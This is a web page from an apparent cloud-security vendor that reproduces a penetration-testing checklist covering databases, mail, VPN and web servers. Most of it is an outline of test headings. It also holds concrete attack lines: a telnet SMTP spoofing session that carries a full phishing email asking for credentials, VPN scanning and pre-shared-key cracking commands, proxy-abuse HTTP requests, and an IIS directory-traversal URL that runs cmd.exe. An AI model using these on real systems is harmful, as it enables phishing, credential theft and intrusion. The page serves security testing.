Cloud-Security.us provides for all your cloud security needs. No more sleepless nights.

Server Specific Vulnerabilities:

Server Specific Tests

Databases
- Direct Access Interrogation
  - MS SQL Server
    - Ports
      - UDP
      - TCP
    - Version
      - SQL Server Resolution Service (SSRS)
      - Other
    - osql
      - Attempt default/common accounts
      - Retrieve data
      - Extract sysxlogins table
  - Oracle
    - Ports
      - UDP
      - TCP
    - TNS Listener
      - VSNUM Converted to hex
      - Ping / version / status / devug / reload /
        services / save_config / stop
      - Leak attack
    - SQL Plus
    - Default Account/Passwords
    - Default SID's
  - MySQL
    - Ports
      - UDP
      - TCP
    - Version
    - Users/Passwords
      - mysql.user
  - DB2
  - Informix
  - Sybase
  - Other
- Scans
  - Default Ports
  - Non-Default Ports
  - Instance Names
  - Versions
- Password Attacks
  - Sniffed Passwords
    - Cracked Passwords
    - Hashes
  - Direct Access Guesses
- Vulnerability Assessment
  - Automated
    - Reports
    - Vulnerabilities
      - Severe
      - High
      - Medium
      - Low
  - Manual
    - Patch Levels
      - Missing Patches
    - Confirmed Vulnerabilities
      - Severe
      - High
      - Medium
      - Low
Mail
- Scans
- Fingerprint
  - Manual
  - Automated
- Spoofable
  - Telnet spoof
    - telnet target_IP 25helo target.commail from: XXXX@XXX.comrcpt to:
      administrator@target.comdataX-Sender: XXXX@XXX.comX-Originating-IP:
      [192.168.1.1]X-Originating-Email: [XXXX@XXX.com]MIME-Version: 1.0To:
      <administrator@target.com>From: < XXXX@XXX.com >Subject: Important! Account check requiredContent-Type:
      text/htmlContent-Transfer-Encoding: 7bitDear Valued Customer, The corporate network has recently gone through a critical update to the Active Directory, we have done this to increase security of the network against hacker attacks to protect your private information. Due to this, you are required to log onto the following website with your current credentials to ensure that your account does not expire.Please go to the following website and log in with your account details. <a href=http://192.168.1.108
      /hacme.html>www.target.com/login</a>Online Security Manager.Target LtdXXXX@XXX.com.
- Relays
VPN
- Scanning
  - 500 UDP IPSEC
  - 1723 TCP PPTP
  - 443 TCP/SSL
  - nmap -sU -PN -p 500 80.75.68.22-27
  - ipsecscan 80.75.68.22 80.75.68.27
- Fingerprinting
  - ike-scan --showbackoff 80.75.68.22 80.75.68.27
- PSK Crack
  - ikeprobe 80.75.68.27
  - sniff for responses with C&A or ikecrack
Web
- Vulnerability Assessment
  - Automated
    - Reports
    - Vulnerabilities
      - Severe
      - High
      - Medium
      - Low
  - Manual
    - Patch Levels
      - Missing Patches
    - Confirmed Vulnerabilities
      - Severe
      - High
      - Medium
      - Low
- Permissions
  - PUT /test.txt HTTP/1.0
  - CONNECT mail.another.com:25 HTTP/1.0
  - POST http://mail.another.com:25/ HTTP/1.0Content-Type:
    text/plainContent-Length: 6
- Scans
- Fingerprinting
  - Other
  - HTTP
    - Commands
      - JUNK / HTTP/1.0
      - HEAD / HTTP/9.3
      - OPTIONS / HTTP/1.0
      - HEAD / HTTP/1.0
      - GET /images HTTP/1.0
      - PROPFIND / HTTP/1.0
    - Modules
      - WebDAV
      - ASP.NET
      - Frontpage
      - OWA
      - IIS ISAPI
      - PHP
      - OpenSSL
    - File Extensions
      - .ASP, .HTM, .PHP, .EXE, .IDQ
  - HTTPS
    - Commands
      - JUNK / HTTP/1.0
      - HEAD / HTTP/9.3
      - OPTIONS / HTTP/1.0
      - HEAD / HTTP/1.0
    - Commands
      - JUNK / HTTP/1.0
      - HEAD / HTTP/9.3
      - OPTIONS / HTTP/1.0
      - HEAD / HTTP/1.0
    - File Extensions
      - .ASP, .HTM, .PHP, .EXE, .IDQ
- Directory Traversal
  - http://www.target.com/scripts/..%255c../
    winnt/system32/cmd.exe?/c+dir+c:\

www.Cloud-Security.us

Server Specific Vulnerabilities: